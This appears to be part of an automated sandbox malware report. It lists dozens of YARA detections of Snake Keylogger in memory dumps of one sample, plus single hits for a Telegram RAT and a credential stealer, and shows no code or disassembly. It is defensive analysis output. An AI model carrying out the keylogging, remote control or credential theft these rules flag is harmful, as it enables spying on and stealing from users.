                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737825477.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738023885.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738485397.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737575208.0000000002968000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737808101.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737431755.0000000002930000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737466902.0000000002940000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737280426.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737670833.000000000298C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737689328.0000000002994000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737225304.00000000028C3000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737609149.0000000002978000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737936851.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737641884.0000000002984000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738147230.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738223259.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738314614.0000000002AC5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737450837.0000000002938000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737597795.0000000002974000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738125525.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738160524.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738425558.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738406461.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738262050.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737864301.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737968200.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737263659.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737253851.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738109588.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737973247.0000000002A59000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737457876.000000000293C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737523761.0000000002950000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737154483.0000000002890000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737212904.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737268236.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737839802.00000000029F8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738270244.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738131471.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737420491.0000000002928000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738395968.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738017194.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737513462.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737567001.0000000002964000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000003.670353008.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                            Reputation:low

                            No disassembly